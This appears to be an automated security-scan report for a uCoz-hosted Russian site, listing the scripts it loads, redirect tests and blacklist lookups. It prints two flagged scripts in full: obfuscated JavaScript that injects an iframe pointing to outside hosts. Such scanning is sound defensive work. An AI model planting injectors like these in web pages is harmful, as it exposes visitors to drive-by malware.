Scanned pages/files
| Request | Server response | Status |
http://333dn.3dn.ru/ | 200 OK Content-Length: 87352 Content-Type: text/html | clean |
http://tm-core.net/zoom.js | 200 OK Content-Length: 1566 Content-Type: application/javascript | clean |
http://s19.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s19.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 39848 Content-Type: text/javascript | clean |
http://s19.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228798 Content-Type: text/javascript | clean |
http://autocontext.begun.ru/autocontext2.js | 200 OK Content-Length: 214 Content-Type: application/x-javascript | clean |
http://returna.net/background.js | 200 OK Content-Length: 192 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://returna.net'; wishyhd.appendChild(emptiestag); | ||
http://i1ii.ru/1.js | 200 OK Content-Length: 188 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://i1ii.ru'; wishyhd.appendChild(emptiestag); | ||
http://333dn.3dn.ru/widget/?44;187|200|2 | 200 OK Content-Length: 812 Content-Type: text/javascript | clean |
http://333dn.3dn.ru/photowidget/swfobject.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2315690 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://333dn.3dn.ru/index/3 | 200 OK Content-Length: 62686 Content-Type: text/html | clean |
http://s19.ucoz.net/src/photo.js?2 | 200 OK Content-Length: 19128 Content-Type: text/javascript | clean |
http://333dn.3dn.ru/load/25 | 200 OK Content-Length: 84556 Content-Type: text/html | clean |
http://333dn.3dn.ru/load/rss/ | 200 OK Content-Length: 39795 Content-Type: text/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 333dn.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 May 2014 08:59:04 GMT
Server: uServ/3.2.2
Content-Length: 87352
Content-Type: text/html; charset=UTF-8
...87352 bytes of data.
GET / HTTP/1.1
Host: 333dn.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 May 2014 08:59:04 GMT
Server: uServ/3.2.2
Content-Length: 87352
Content-Type: text/html; charset=UTF-8
...87352 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 333dn.3dn.ru
Referer: http://www.google.com/search?q=333dn.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 333dn.3dn.ru
Referer: http://www.google.com/search?q=333dn.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=333dn.3dn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://333dn.3dn.ru/
Result: 333dn.3dn.ru is not infected or malware details are not published yet.
Result: 333dn.3dn.ru is not infected or malware details are not published yet.